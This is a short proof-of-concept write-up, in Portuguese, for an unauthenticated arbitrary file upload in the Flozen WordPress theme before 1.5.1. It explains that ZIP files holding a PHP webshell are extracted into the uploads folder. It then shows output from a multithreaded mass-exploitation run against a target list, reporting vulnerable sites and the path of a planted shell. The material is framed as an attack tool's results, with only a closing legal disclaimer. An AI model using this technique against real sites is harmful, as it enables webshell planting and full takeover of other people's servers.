
POC
Flozen < 1.5.1 - Upload Arbitrário de Arquivo Não Autenticado
Tema Flozen < 1.5.1 - Upload Arbitrário de Arquivo Não Autenticado
Descrição
O Tema Flozen para WordPress (versões até 1.5.1 inclusive) é vulnerável a upload arbitrário de arquivos não autenticados, devido à falta de verificações de autenticação e validação insuficiente de tipo de arquivo na função flozen_add_new_custom_font(). Isso permite que atacantes não autenticados enviem arquivos ZIP arbitrários contendo código PHP malicioso (por exemplo, webshell), que são automaticamente extraídos para wp-content/uploads/nasa-custom-fonts/, resultando em execução remota completa de código (RCE).
~ Pontuação CVSS: 9.8 (Crítico)
~ Versões Afetadas: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
O uso não autorizado de sistemas que você não possui ou para os quais não tem permissão para testar é ilegal.